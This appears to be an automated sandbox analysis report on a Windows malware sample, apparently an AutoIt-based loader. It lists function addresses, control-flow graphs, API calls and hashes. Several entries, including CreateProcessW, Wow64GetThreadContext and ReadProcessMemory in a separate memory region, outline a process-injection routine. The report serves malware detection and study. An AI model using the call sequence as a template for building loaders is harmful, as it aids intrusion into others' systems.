                                                                                                                            control_flow_graph 340 414f10-414f2c 341 414f4f 340->341 342 414f2e-414f31 340->342 343 414f51-414f55 341->343 342->341 344 414f33-414f35 342->344 345 414f37-414f46 call 417f23 344->345 346 414f56-414f5b 344->346 356 414f47-414f4c call 417ebb 345->356 348 414f6a-414f6d 346->348 349 414f5d-414f68 346->349 352 414f7a-414f7c 348->352 353 414f6f-414f77 call 4131f0 348->353 349->348 351 414f8b-414f9e 349->351 354 414fa0-414fa6 351->354 355 414fa8 351->355 352->345 358 414f7e-414f89 352->358 353->352 359 414faf-414fb1 354->359 355->359 356->341 358->345 358->351 362 4150a1-4150a4 359->362 363 414fb7-414fbe 359->363 362->343 365 414fc0-414fc5 363->365 366 415004-415007 363->366 365->366 367 414fc7 365->367 368 415071-415072 call 41e6b1 366->368 369 415009-41500d 366->369 370 415102 367->370 371 414fcd-414fd1 367->371 380 415077-41507b 368->380 373 41500f-415018 369->373 374 41502e-415035 369->374 375 415106-41510f 370->375 378 414fd3 371->378 379 414fd5-414fd8 371->379 381 415023-415028 373->381 382 41501a-415021 373->382 376 415037 374->376 377 415039-41503c 374->377 375->343 376->377 384 415042-41504e call 41453a call 41ed9e 377->384 385 4150d5-4150d9 377->385 378->379 386 4150a9-4150af 379->386 387 414fde-414fff call 41ee9b 379->387 380->375 388 415081-415085 380->388 383 41502a-41502c 381->383 382->383 383->377 408 415053-415058 384->408 394 4150eb-4150fd call 417f23 385->394 395 4150db-4150e8 call 4131f0 385->395 390 4150b1-4150bd call 4131f0 386->390 391 4150c0-4150d0 call 417f23 386->391 396 415099-41509b 387->396 388->385 389 415087-415096 388->389 389->396 390->391 391->356 394->356 395->394 396->362 396->363 409 415114-415118 408->409 410 41505e-415061 408->410 409->375 410->370 411 415067-41506f 410->411 411->396
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3886058894-0
                                                                                                                            • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                            • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                                                                            • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                                                                            • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99
                                                                                                                            Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • _memset.LIBCMT ref: 00401C62
                                                                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                            • String ID: Line:
                                                                                                                            • API String ID: 1620655955-1585850449
                                                                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                            Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 445 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShow
                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                            • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                            • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                            • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                            • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                            Function 03DDC3B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 446 3ddc3b8-3ddc4f5 call 3dda008 call 3ddc2a8 CreateFileW 453 3ddc4fc-3ddc50c 446->453 454 3ddc4f7 446->454 457 3ddc50e 453->457 458 3ddc513-3ddc52d VirtualAlloc 453->458 455 3ddc5ac-3ddc5b1 454->455 457->455 459 3ddc52f 458->459 460 3ddc531-3ddc548 ReadFile 458->460 459->455 461 3ddc54c-3ddc586 call 3ddc2e8 call 3ddb2a8 460->461 462 3ddc54a 460->462 467 3ddc588-3ddc59d call 3ddc338 461->467 468 3ddc5a2-3ddc5aa ExitProcess 461->468 462->455 467->468 468->455
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03DDC2A8: Sleep.KERNELBASE(000001F4), ref: 03DDC2B9
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03DDC4EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileSleep
                                                                                                                            • String ID: D37CQX8XG9W5VXR7
                                                                                                                            • API String ID: 2694422964-141538130
                                                                                                                            • Opcode ID: 940321b65b91a7e82ee4f0c83cdf54ffdc6368fc8143c373afdac5a500eb2a6f
                                                                                                                            • Instruction ID: 71bf4f63da1259192fd49c370d982107a0a5e7d7a04005c17cbe94096a992c5a
                                                                                                                            • Opcode Fuzzy Hash: 940321b65b91a7e82ee4f0c83cdf54ffdc6368fc8143c373afdac5a500eb2a6f
                                                                                                                            • Instruction Fuzzy Hash: B1519030D14248EBEF21DBE4C855BEEBB79AF05300F004199E608BB2C0D7BA1B45CB65
                                                                                                                            Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 470 413a88-413a99 call 41718c 473 413b10-413b15 call 4171d1 470->473 474 413a9b-413aa2 470->474 475 413aa4-413abc call 418407 call 419f6d 474->475 476 413ae7 474->476 488 413ac7-413ad7 call 413ade 475->488 489 413abe-413ac6 call 419f9d 475->489 478 413ae8-413af8 RtlFreeHeap 476->478 478->473 481 413afa-413b0f call 417f23 GetLastError call 417ee1 478->481 481->473 488->473 495 413ad9-413adc 488->495 489->488 495->478
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 00413AA6
                                                                                                                              • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                              • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                              • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                            • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                            • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                            • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2714421763-0
                                                                                                                            • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                            • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                            • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                            • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                            Function 004734B7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 234COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-554117064
                                                                                                                            • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                            • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                            • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                            • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                            Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                              • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                            • _strcat.LIBCMT ref: 0040F603
                                                                                                                              • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                              • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 1194219731-2761332787
                                                                                                                            • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                            • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                            • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                            • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                            Function 03DDB2A8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 03DDBA63
                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03DDBAF9
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03DDBB1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2438371351-0
                                                                                                                            • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                            • Instruction ID: d88cbaafdaddd9b3062af23be302dfa44e3d40e897452c0bfd8b2830dea009ae
                                                                                                                            • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                                                                                            • Instruction Fuzzy Hash: B762F930A142589BEB24CFA4C850BDEB376EF58704F1091A9D10DEB2A4E7799E81CB59
                                                                                                                            Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0040E202
                                                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconNotifyShell__memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 928536360-0
                                                                                                                            • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                            • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                            • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                            • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                            Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00411734
                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1411284514-0
                                                                                                                            • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                            • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                            • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                            • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                            Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharLower
                                                                                                                            • String ID: $8'I
                                                                                                                            • API String ID: 2358735015-3608026889
                                                                                                                            • Opcode ID: 748fd34e705feece15d68f8c3a217e3aa4bbfba358ae0ad0ee494a8265da257e
                                                                                                                            • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                                                                                                            • Opcode Fuzzy Hash: 748fd34e705feece15d68f8c3a217e3aa4bbfba358ae0ad0ee494a8265da257e
                                                                                                                            • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                                                                                                            Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3677997916-0
                                                                                                                            • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                            • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                            • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                            • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                            Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00435278
                                                                                                                              • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                              • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                              • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                            • _malloc.LIBCMT ref: 00435288
                                                                                                                            • _malloc.LIBCMT ref: 00435298
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 680241177-0
                                                                                                                            • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                            • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                            • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                            • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
